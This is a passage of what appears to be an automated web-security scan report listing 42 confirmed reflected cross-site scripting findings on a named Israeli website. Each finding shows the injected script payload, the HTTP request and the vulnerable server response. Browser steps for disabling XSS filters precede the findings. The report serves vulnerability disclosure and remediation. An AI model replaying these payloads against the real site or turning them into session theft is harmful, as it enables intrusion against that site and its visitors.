Generated XSS exploit might not work due to browser XSS filtering. Please follow the guidelines below in order to disable XSS filtering for different browsers.
Also note that;
XSS filtering is a feature that's enabled by default in some of the modern browsers. It should only be disabled temporarily to test exploits and should
be reverted back if the browser is actively used other than testing purposes.
Even though browsers have certain checks to prevent Cross-site scripting attacks in practice there are a variety of ways to bypass this mechanism
therefore a web application should not rely on this kind of client-side browser checks.
Chrome
Open command prompt.
Go to folder where chrome.exe is located.
Run the command chrome.exe --args --disable-xss-auditor
Internet Explorer
Click Tools->Internet Options and then navigate to the Security Tab.
Click Custom level and scroll towards the bottom where you will find that Enable XSS filter is currently Enabled.
Set it to disabled. Click OK.
Click Yes to accept the warning followed by Apply.
Firefox
Go to about:config in the URL address bar.
In the search field, type urlbar.filter and find browser.urlbar.filter.javascript.
Set its value to false by double clicking the row.
Classification
22 / 146
3.1. /allvideo/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001D1)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/allvideo/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001D1)%3..
Parameters
URI-BASED Full URL '"--></style></script>
<script>alert(0x0001D1)</script>
Request
GET /allvideo/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001D1)%3C/script%3E HTTP/1.1
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 13:48:00 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 169
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/allvideo/'"--></style></script><script>netsparker(0x0001D1)</script><BR>script><BR>style><<script>netsparker(0x0001D1)<.asp?id=script>
3.2. /ask/reg/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00062A)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/ask/reg/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00062A)%3C..
Parameters
<script>alert(0x00062A)</script>
Request
GET /ask/reg/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00062A)%3C/script%3E HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 14:07:40 GMT
Content-Length: 168
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/ask/reg/'"--></style></script><script>netsparker(0x00062A)</script><BR>script><BR>style><<script>netsparker(0x00062A)<.asp?id=script>
3.3. /contact/reg/maillingUpdate.asp CONFIRMED
http://www.shalomlaam.co.il/contact/reg/maillingUpdate.asp?'"--></style></script><script>alert(0x000..
Parameters
emailtonews POST netsparker@example.com
Query Based Query String '"--></style></script>
<script>alert(0x00049B)</script>
23 / 146
Request
POST /contact/reg/maillingUpdate.asp?'"--></style></script><script>netsparker(0x00049B)</script> HTTP/1.1
Content-Length: 37
emailtonews=netsparker%40example.com&
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 14:03:14 GMT
Content-Length: 191
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/contact/reg/maillingUpdate.asp?'"--></style></script><script>netsparker(0x00049B)</script><BR>script><BR>style><<script>netsparker(0x00049B)<.asp?
id=script>
3.4. /images/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000105)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/images/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000105)%3C/..
Parameters
<script>alert(0x000105)</script>
Request
GET /images/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000105)%3C/script%3E HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 13:44:09 GMT
Content-Length: 167
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/images/'"--></style></script><script>netsparker(0x000105)</script><BR>script><BR>style><<script>netsparker(0x000105)<.asp?id=script>
3.5. /bmidrash/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001C7)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/bmidrash/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001C7)%3..
Parameters
<script>alert(0x0001C7)</script>
Request
GET /bmidrash/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001C7)%3C/script%3E HTTP/1.1
24 / 146
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 13:47:53 GMT
Content-Length: 169
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/bmidrash/'"--></style></script><script>netsparker(0x0001C7)</script><BR>script><BR>style><<script>netsparker(0x0001C7)<.asp?id=script>
3.6. /js/+%20win%20+'%22--
CONFIRMED
http://www.shalomlaam.co.il/js/+%20win%20+'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0004..
Parameters
Request
GET /js/+%20win%20+'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000409)%3C/script%3E HTTP/1.1
Referer: http://www.shalomlaam.co.il/js/func_site.js
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 14:00:53 GMT
Content-Length: 170
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/js/+ win +'"--></style></script><script>netsparker(0x000409)</script><BR>script><BR>style><<script>netsparker(0x000409)<.asp?id=script>
3.7. /video/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001CE)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/video/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001CE)%3C/s..
Parameters
<script>alert(0x0001CE)</script>
Request
GET /video/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001CE)%3C/script%3E HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 13:47:58 GMT
Content-Length: 166
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/video/'"--></style></script><script>netsparker(0x0001CE)</script><BR>script><BR>style><<script>netsparker(0x0001CE)<.asp?id=script>
25 / 146
3.8. /news'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001B7)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/news'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001B7)%3C/scr..
Parameters
<script>alert(0x0001B7)</script>
Request
GET /news'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001B7)%3C/script%3E HTTP/1.1
Referer: http://www.shalomlaam.co.il/
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 13:47:29 GMT
Content-Length: 164
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/news'"--></style></script><script>netsparker(0x0001B7)</script><BR>script><BR>style><<script>netsparker(0x0001B7)<.asp?id=script>
3.9. /gvideo/testimonialrotator/testimonialrotator.js'%22--
CONFIRMED
http://www.shalomlaam.co.il/gvideo/testimonialrotator/testimonialrotator.js'%22--%3E%3C/style%3E%3C/..
Parameters
Request
GET /gvideo/testimonialrotator/testimonialrotator.js'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000449)%3C/script%3E HTTP/1.1
Referer: http://www.shalomlaam.co.il/gvideo/index.html
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 14:01:40 GMT
Content-Length: 207
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/gvideo/testimonialrotator/testimonialrotator.js'"--></style></script><script>netsparker(0x000449)</script><BR>script><BR>style>
<<script>netsparker(0x000449)<.asp?id=script>
26 / 146
3.10. /js/delate_image.asp CONFIRMED
http://www.shalomlaam.co.il/js/delate_image.asp?'"--></style></script><script>alert(0x0003D6)</script>
Parameters
field GET picture_
Request
GET /js/delate_image.asp?'"--></style></script><script>netsparker(0x0003D6)</script> HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 14:00:30 GMT
Content-Length: 180
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/js/delate_image.asp?'"--></style></script><script>netsparker(0x0003D6)</script><BR>script><BR>style><<script>netsparker(0x0003D6)<.asp?id=script>
3.11. /'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000DB)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000DB)%3C/script%3E
Parameters
<script>alert(0x0000DB)</script>
Request
GET /'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0000DB)%3C/script%3E HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 13:43:53 GMT
Content-Length: 160
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/'"--></style></script><script>netsparker(0x0000DB)</script><BR>script><BR>style><<script>netsparker(0x0000DB)<.asp?id=script>
3.12. /pitgam'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00013F)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/pitgam'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00013F)%3C/s..
Parameters
<script>alert(0x00013F)</script>
27 / 146
Request
GET /pitgam'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00013F)%3C/script%3E HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 13:44:38 GMT
Content-Length: 166
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/pitgam'"--></style></script><script>netsparker(0x00013F)</script><BR>script><BR>style><<script>netsparker(0x00013F)<.asp?id=script>
3.13. /alon/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000150)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/alon/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000150)%3C/sc..
Parameters
Request
GET /alon/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000150)%3C/script%3E HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 13:44:50 GMT
Content-Length: 165
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/alon/'"--></style></script><script>netsparker(0x000150)</script><BR>script><BR>style><<script>netsparker(0x000150)<.asp?id=script>
3.14. /gvideo/style/style.css'%22--
CONFIRMED
http://www.shalomlaam.co.il/gvideo/style/style.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealer..
Parameters
Request
GET /gvideo/style/style.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000452)%3C/script%3E HTTP/1.1
28 / 146
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 14:01:43 GMT
Content-Length: 182
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/gvideo/style/style.css'"--></style></script><script>netsparker(0x000452)</script><BR>script><BR>style><<script>netsparker(0x000452)<.asp?id=script>
3.15. /alon/Default.asp'%22--
CONFIRMED
http://www.shalomlaam.co.il/alon/Default.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00..
Parameters
id GET 0
Request
GET /alon/Default.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00043A)%3C/script%3E HTTP/1.1
Referer: http://www.shalomlaam.co.il/site/alon/
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 14:01:34 GMT
Content-Length: 176
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/alon/Default.asp'"--></style></script><script>netsparker(0x00043A)</script><BR>script><BR>style><<script>netsparker(0x00043A)<.asp?id=script>
3.16. /site/alon/'%22--
CONFIRMED
http://www.shalomlaam.co.il/site/alon/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00012E)%..
Parameters
<script>alert(0x00012E)</script>
Request
GET /site/alon/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00012E)%3C/script%3E HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 13:44:25 GMT
Content-Length: 170
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/site/alon/'"--></style></script><script>netsparker(0x00012E)</script><BR>script><BR>style><<script>netsparker(0x00012E)<.asp?id=script>
29 / 146
3.17. /page/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0004E9)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/page/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0004E9)%3C/sc..
Parameters
<script>alert(0x0004E9)</script>
Request
GET /page/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0004E9)%3C/script%3E HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 14:03:46 GMT
Content-Length: 165
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/page/'"--></style></script><script>netsparker(0x0004E9)</script><BR>script><BR>style><<script>netsparker(0x0004E9)<.asp?id=script>
3.18. /lessons/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001A8)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/lessons/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001A8)%3C..
Parameters
<script>alert(0x0001A8)</script>
Request
GET /lessons/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001A8)%3C/script%3E HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 13:47:20 GMT
Content-Length: 168
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/lessons/'"--></style></script><script>netsparker(0x0001A8)</script><BR>script><BR>style><<script>netsparker(0x0001A8)<.asp?id=script>
3.19. /about/search/'%22--
CONFIRMED
http://www.shalomlaam.co.il/about/search/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00052..
Parameters
30 / 146
Request
GET /about/search/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00052F)%3C/script%3E HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 14:04:11 GMT
Content-Length: 173
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/about/search/'"--></style></script><script>netsparker(0x00052F)</script><BR>script><BR>style><<script>netsparker(0x00052F)<.asp?id=script>
3.20. /js/upload_image.asp CONFIRMED
http://www.shalomlaam.co.il/js/upload_image.asp?'"--></style></script><script>alert(0x0003B2)</script>
Parameters
field GET picture_
Request
GET /js/upload_image.asp?'"--></style></script><script>netsparker(0x0003B2)</script> HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 14:00:21 GMT
Content-Length: 180
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/js/upload_image.asp?'"--></style></script><script>netsparker(0x0003B2)</script><BR>script><BR>style><<script>netsparker(0x0003B2)<.asp?id=script>
3.21. /site/alon/archive.asp'%22--
CONFIRMED
http://www.shalomlaam.co.il/site/alon/archive.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert..
Parameters
Request
GET /site/alon/archive.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00029F)%3C/script%3E HTTP/1.1
Referer: http://www.shalomlaam.co.il/sitemap.xml
31 / 146
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 13:56:21 GMT
Content-Length: 181
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/site/alon/archive.asp'"--></style></script><script>netsparker(0x00029F)</script><BR>script><BR>style><<script>netsparker(0x00029F)<.asp?id=script>
3.22. /ask/search/'%22--
CONFIRMED
http://www.shalomlaam.co.il/ask/search/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000646)..
Parameters
Request
GET /ask/search/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000646)%3C/script%3E HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 14:08:01 GMT
Content-Length: 171
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/ask/search/'"--></style></script><script>netsparker(0x000646)</script><BR>script><BR>style><<script>netsparker(0x000646)<.asp?id=script>
3.23. /search/default.asp CONFIRMED
http://www.shalomlaam.co.il/search/default.asp?q='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert..
Parameters
q GET '"--></style></script>
Request
GET /search/default.asp?q='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000245)%3C/script%3E HTTP/1.1
Response
valign="top">
<table width="800" border="0" cellspacing="0" cellpadding="0">
<tr dir="rtl">
<td valign="top"><h1><span class="text_h1"><span class="koteret" dir="rtl"> ''''--></style></script><script>netsparker(0x000245)</script></span></span></h1>
<table width="560" border="0" align="left" cellpadding="0" cellspacing="0">
<tr><td><span style="font-weight:Normal; font-size:15px;"> 0 </sp
32 / 146
3.24. /tags/tags.asp'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001CB)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/tags/tags.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001C..
Parameters
<script>alert(0x0001CB)</script>
Request
GET /tags/tags.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001CB)%3C/script%3E HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 13:47:56 GMT
Content-Length: 173
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/tags/tags.asp'"--></style></script><script>netsparker(0x0001CB)</script><BR>script><BR>style><<script>netsparker(0x0001CB)<.asp?id=script>
3.25. /js/+%20win%20+ CONFIRMED
http://www.shalomlaam.co.il/js/+%20win%20+?'"--></style></script><script>alert(0x00040D)</script>
Parameters
<script>alert(0x00040D)</script>
Request
GET /js/+%20win%20+?'"--></style></script><script>netsparker(0x00040D)</script> HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 14:00:55 GMT
Content-Length: 171
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/js/+ win +?'"--></style></script><script>netsparker(0x00040D)</script><BR>script><BR>style><<script>netsparker(0x00040D)<.asp?id=script>
33 / 146
3.26. /jAccordion/default.css'%22--
CONFIRMED
http://www.shalomlaam.co.il/jAccordion/default.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealer..
Parameters
Request
GET /jAccordion/default.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000127)%3C/script%3E HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 13:44:21 GMT
Content-Length: 182
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/jAccordion/default.css'"--></style></script><script>netsparker(0x000127)</script><BR>script><BR>style><<script>netsparker(0x000127)<.asp?id=script>
3.27. /Presentation/'%22--
CONFIRMED
http://www.shalomlaam.co.il/Presentation/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00014..
Parameters
Request
GET /Presentation/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000145)%3C/script%3E HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 13:44:42 GMT
Content-Length: 173
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/Presentation/'"--></style></script><script>netsparker(0x000145)</script><BR>script><BR>style><<script>netsparker(0x000145)<.asp?id=script>
34 / 146
3.28. /contact/reg/'%22--
CONFIRMED
http://www.shalomlaam.co.il/contact/reg/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00046E..
Parameters
Request
GET /contact/reg/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00046E)%3C/script%3E HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 14:02:57 GMT
Content-Length: 172
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/contact/reg/'"--></style></script><script>netsparker(0x00046E)</script><BR>script><BR>style><<script>netsparker(0x00046E)<.asp?id=script>
3.29. /l/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001A7)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/l/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001A7)%3C/scrip..
Parameters
Request
GET /l/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001A7)%3C/script%3E HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 13:47:18 GMT
Content-Length: 162
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/l/'"--></style></script><script>netsparker(0x0001A7)</script><BR>script><BR>style><<script>netsparker(0x0001A7)<.asp?id=script>
3.30. /scripts/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000FD)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/scripts/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000FD)%3C..
Parameters
<script>alert(0x0000FD)</script>
35 / 146
Request
GET /scripts/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0000FD)%3C/script%3E HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 13:44:07 GMT
Content-Length: 168
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/scripts/'"--></style></script><script>netsparker(0x0000FD)</script><BR>script><BR>style><<script>netsparker(0x0000FD)<.asp?id=script>
3.31. /gvideo/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000115)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/gvideo/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000115)%3C/..
Parameters
Request
GET /gvideo/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000115)%3C/script%3E HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 13:44:15 GMT
Content-Length: 167
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/gvideo/'"--></style></script><script>netsparker(0x000115)</script><BR>script><BR>style><<script>netsparker(0x000115)<.asp?id=script>
3.32. /contact/search/default.asp'%22--
CONFIRMED
http://www.shalomlaam.co.il/contact/search/default.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3E..
Parameters
q GET 3
Request
GET /contact/search/default.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0004D2)%3C/script%3E HTTP/1.1
36 / 146
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 14:03:33 GMT
Content-Length: 186
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/contact/search/default.asp'"--></style></script><script>netsparker(0x0004D2)</script><BR>script><BR>style><<script>netsparker(0x0004D2)<.asp?id=script>
3.33. /contact/reg/maillingUpdate.asp'%22--
CONFIRMED
http://www.shalomlaam.co.il/contact/reg/maillingUpdate.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscrip..
Parameters
Request
POST /contact/reg/maillingUpdate.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000498)%3C/script%3E HTTP/1.1
Content-Length: 37
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 14:03:12 GMT
Content-Length: 190
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/contact/reg/maillingUpdate.asp'"--></style></script><script>netsparker(0x000498)</script><BR>script><BR>style><<script>netsparker(0x000498)<.asp?
id=script>
3.34. /kaftorim/'%22--
CONFIRMED
http://www.shalomlaam.co.il/kaftorim/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00057E)%3..
Parameters
Request
GET /kaftorim/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00057E)%3C/script%3E HTTP/1.1
37 / 146
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 14:04:37 GMT
Content-Length: 169
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/kaftorim/'"--></style></script><script>netsparker(0x00057E)</script><BR>script><BR>style><<script>netsparker(0x00057E)<.asp?id=script>
3.35. /ask/ CONFIRMED
http://www.shalomlaam.co.il/ask/?cat=3&page=3&rabbi='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eal..
Parameters
cat GET 3
page GET 3
rabbi GET '"--></style></script>
tbl GET 3
Request
GET /ask/?cat=3&page=3&rabbi='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000611)%3C/script%3E&tbl=3 HTTP/1.1
Referer: http://www.shalomlaam.co.il/ask/
Response
top" width="50">
<form name=form method=get target="_top">
<INPUT TYPE='hidden' NAME='tbl' value=''>
<INPUT TYPE='hidden' NAME='cat' value='3'>
<INPUT TYPE='hidden' NAME='rabbi' value=''"--></style></script><script>netsparker(0x000611)</script>'>
<select name='page' dir=rtl onChange='form.submit()'>
<script LANGUAGE="JavaScript">
for(var i=1;i<=23;i++){
if (i!=3){
document.write('<option value='+i+'>'+i);
}
else
3.36. /ask/reg/maillingUpdate.asp'%22--
CONFIRMED
http://www.shalomlaam.co.il/ask/reg/maillingUpdate.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3E..
Parameters
Request
POST /ask/reg/maillingUpdate.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000642)%3C/script%3E HTTP/1.1
Content-Length: 37
38 / 146
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 14:07:54 GMT
Content-Length: 186
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/ask/reg/maillingUpdate.asp'"--></style></script><script>netsparker(0x000642)</script><BR>script><BR>style><<script>netsparker(0x000642)<.asp?id=script>
3.37. /default.asp'%22--
CONFIRMED
http://www.shalomlaam.co.il/default.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000216)..
Parameters
Request
GET /default.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000216)%3C/script%3E HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 13:48:35 GMT
Content-Length: 171
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/default.asp'"--></style></script><script>netsparker(0x000216)</script><BR>script><BR>style><<script>netsparker(0x000216)<.asp?id=script>
3.38. /site/yeshiva/'%22--
CONFIRMED
http://www.shalomlaam.co.il/site/yeshiva/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002B..
Parameters
Request
GET /site/yeshiva/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0002B1)%3C/script%3E HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 13:56:30 GMT
Content-Length: 173
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/site/yeshiva/'"--></style></script><script>netsparker(0x0002B1)</script><BR>script><BR>style><<script>netsparker(0x0002B1)<.asp?id=script>
39 / 146
3.39. /js/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000D7)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/js/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000D7)%3C/scri..
Parameters
Request
GET /js/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0000D7)%3C/script%3E HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 13:43:52 GMT
Content-Length: 163
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/js/'"--></style></script><script>netsparker(0x0000D7)</script><BR>script><BR>style><<script>netsparker(0x0000D7)<.asp?id=script>
3.40. /home/1.css'%22--
CONFIRMED
http://www.shalomlaam.co.il/home/1.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000119)%..
Parameters
Request
GET /home/1.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000119)%3C/script%3E HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 13:44:17 GMT
Content-Length: 170
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/home/1.css'"--></style></script><script>netsparker(0x000119)</script><BR>script><BR>style><<script>netsparker(0x000119)<.asp?id=script>
40 / 146
3.41. /site/contact/'%22--
CONFIRMED
http://www.shalomlaam.co.il/site/contact/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00028..
Parameters
Request
GET /site/contact/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00028A)%3C/script%3E HTTP/1.1
Response
HTTP/1.1 200 OK
Cache-Control: private
Date: Tue, 20 May 2014 13:56:05 GMT
Content-Encoding:
Transfer-Encoding: chunked
404;http://www.shalomlaam.co.il:80/site/contact/'"--></style></script><script>netsparker(0x00028A)</script><BR>script><BR>style><<script>netsparker(0x00028A)<.asp?id=script>
3.42. /site/l/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002A2)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/site/l/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002A2)%3C/..
Parameters
Request
GET /site/l/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0002A2)%3C/script%3E HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 13:56:22 GMT
Content-Encoding:
